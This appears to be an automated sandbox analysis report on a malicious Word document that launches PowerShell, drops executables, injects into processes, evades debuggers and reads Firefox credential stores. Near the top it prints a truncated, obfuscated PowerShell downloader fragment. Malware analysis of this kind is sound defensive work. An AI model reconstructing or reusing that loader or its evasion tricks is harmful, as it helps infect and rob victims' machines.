AMwAyACwAIAAxADEAMAAsACAAMQAwADEALAAxADEAOQAsADQANQAgACwAIAAxADEAMQAsACAAOQA4ACAALAAxADAANgAgACwAMQAwADEAIAAsACAAOQA5ACAALAAgADEAMQA2ACwAMwAyACAAL

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded [stRInG]::JOin( '',(( 36 , 119 ,115, 99, 114 ,105 , 112 ,116 ,32, 61 , 32, 110, 101 ,119, 45 , 111, 98 , 106 , 101 , 99 ,116 , 32 , 45 ,67,111,109, 79, 98, 106, 101 , 99 , 116,32, 87 , 83, 99 ,114, 105 , 112,116 , 46,83 , 104 , 101,108 , 108,59 ,36, 119 ,101,98 , 99, 108 , 105 ,101, 110 , 116,32 , 61 ,32, 110, 101,119,45 , 111, 98 ,106 ,101 , 99 , 116,32 ,83 ,121, 115 ,116 ,101 , 109 , 46, 78,101, 116 ,46,87 ,101 ,98 , 67 , 108, 105 , 101 , 110,116 , 59, 36, 114 ,97,110,100, 111 , 109, 32, 61 ,32 , 1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: Base64 decoded [stRInG]::JOin( '',(( 36 , 119 ,115, 99, 114 ,105 , 112 ,116 ,32, 61 , 32, 110, 101 ,119, 45 , 111, 98 , 106 , 101 , 99 ,116 , 32 , 45 ,67,111,109, 79, 98, 106, 101 , 99 , 116,32, 87 , 83, 99 ,114, 105 , 112,116 , 46,83 , 104 , 101,108 , 108,59 ,36, 119 ,101,98 , 99, 108 , 105 ,101, 110 , 116,32 , 61 ,32, 110, 101,119,45 , 111, 98 ,106 ,101 , 99 , 116,32 ,83 ,121, 115 ,116 ,101 , 109 , 46, 78,101, 116 ,46,87 ,101 ,98 , 67 , 108, 105 , 101 , 110,116 , 59, 36, 114 ,97,110,100, 111 , 109, 32, 61 ,32 , 1

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\System32\wlangdi.exe

Thread register set: target process: 3592

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: page read and write and page guard

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System information queried: KernelDebuggerInformation

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe

Code function: 4_2_004F1D8F VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

4_2_004F1D8F

Contains functionality to read the PEB

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Code function: 4_2_004F1B03 mov eax, dword ptr fs:[00000030h]	4_2_004F1B03
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Code function: 5_2_003E1B03 mov eax, dword ptr fs:[00000030h]	5_2_003E1B03
Source: C:\Windows\System32\wlangdi.exe	Code function: 6_2_002E1B03 mov eax, dword ptr fs:[00000030h]	6_2_002E1B03
Source: C:\Windows\System32\wlangdi.exe	Code function: 7_2_002E1B03 mov eax, dword ptr fs:[00000030h]	7_2_002E1B03
Source: C:\Windows\System32\QYIyP.exe	Code function: 8_2_00511B03 mov eax, dword ptr fs:[00000030h]	8_2_00511B03
Source: C:\Windows\System32\QYIyP.exe	Code function: 9_2_00A01B03 mov eax, dword ptr fs:[00000030h]	9_2_00A01B03

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe

Code function: 4_2_004F924D EntryPoint,GetProcessHeap,RtlAllocateHeap,memset,GetProcessHeap,HeapFree,ExitProcess,

4_2_004F924D

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Malware Analysis System Evasion:

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Checks the free space of harddrives

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\QYIyP.exe	File Volume queried: C:\ FullSizeInformation

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Thread delayed: delay time: 200
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

Found large amount of non-executed APIs

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	API coverage: 7.5 %
Source: C:\Windows\System32\wlangdi.exe	API coverage: 6.7 %

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224	Thread sleep time: -120000s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3204	Thread sleep time: -922337203685477s >= -60s
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe TID: 3308	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wlangdi.exe TID: 3368	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\QYIyP.exe TID: 3440	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wlangdi.exe TID: 3512	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wlangdi.exe TID: 3596	Thread sleep time: -5000s >= -60s
Source: C:\Windows\System32\wlangdi.exe TID: 3604	Thread sleep time: -500s >= -60s
Source: C:\Windows\System32\wbem\WmiApSrv.exe TID: 3896	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wbem\WmiApSrv.exe TID: 3960	Thread sleep time: -120000s >= -60s

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Windows\System32\QYIyP.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_8-9703
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_4-9298
Source: C:\Windows\System32\wlangdi.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_6-9956

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe	Process information set: FAILCRITICALERRORS and NOOPENFILEERRORBOX

Document contains OLE streams with high entropy indicating encrypted embedded content

Show sources

Source: new order upcoming.doc

Stream path 'Data' entropy: 7.98881108447 (max. 8.0)

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network Connect: 69.195.124.165 80

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 7080
Source: unknown	Network traffic detected: HTTP traffic on port 7080 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 7080
Source: unknown	Network traffic detected: HTTP traffic on port 7080 -> 49169

Language, Device and Operating System Detection:

Contains functionality to query the account / user name

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe

Code function: 4_2_004E1B0D GetUserNameA,GetComputerNameA,GetComputerNameA,GetComputerNameExA,GetComputerNameExA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,CreateFileA,CloseHandle,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,CreateFileA,CloseHandle,CreateFileA,CloseHandle,CreateFileA,CreateFileA,CloseHandle,CreateFileA,CloseHandle,CreateFileA,CloseHandle,CreateFileA,CloseHandle,CreateFileA,CreateFileA,CloseHandle,CreateFileA,CloseHandle,CreateFileA,CloseHandle,

4_2_004E1B0D

Contains functionality to query windows version

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe

Code function: 4_2_004F82E6 RtlGetVersion,GetNativeSystemInfo,

4_2_004F82E6

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wlangdi.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\QYIyP.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wlangdi.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wlangdi.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db VolumeInformation
Source: C:\Windows\System32\wlangdi.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wlangdi.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db VolumeInformation
Source: C:\Windows\System32\wlangdi.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db VolumeInformation
Source: C:\Windows\System32\wlangdi.exe	Queries volume information: C:\ VolumeInformation

Behavior Graph

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

AV Detection:

Cryptography:

Spam, unwanted Advertisements and Ransom Demands:

Software Vulnerabilities:

Networking:

Boot Survival:

Stealing of Sensitive Information:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph